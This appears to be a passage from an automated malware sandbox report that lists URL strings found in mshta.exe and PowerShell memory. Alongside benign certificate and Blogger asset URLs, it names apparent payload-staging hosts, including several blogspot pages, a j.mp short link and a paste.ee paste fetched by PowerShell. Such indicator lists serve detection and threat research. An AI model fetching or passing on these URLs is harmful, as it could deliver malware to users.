              Source: mshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmpString found in binary or memory: Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: http://csi.gstatic.com/csi
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: http://j.mp/
              Source: mshta.exe, 00000006.00000003.2264502398.00000000003F5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269237459.0000000000430000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/dbgghasdnasdjasgdakgsdhv
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gs
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/g
              Source: mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
              Source: mshta.exe, 00000006.00000003.2250091244.0000000003B4B000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt05
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0C
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BlogPosting
              Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2231119435.0000000004080000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2243633505.0000000008621000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308627180.000000000592E000.00000004.00000001.sdmpString found in binary or memory: http://www.blogger.com/go/cookiechoices
              Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmpString found in binary or memory: http://www.cookiechoices.org/
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
              Source: powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/plusone.js
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmpString found in binary or memory: https://backbones1234511a.blogspot.com/p/stback1.html
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://csi.gstatic.com/csi
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmpString found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://i18n-cloud.appspot.com
              Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogs
              Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot
              Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/
              Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/(
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/Q
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
              Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
              Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
              Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/
              Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
              Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
              Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
              Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
              Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
              Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
              Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
              Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
              Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/search
              Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
              Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmpString found in binary or memory: https://paste.ee/r/9IDWy
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
              Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmpString found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
              Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmpString found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
              Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
              Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
              Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://s.ytimg.com
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmpString found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/intent/tweet?text=
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogblog.com;
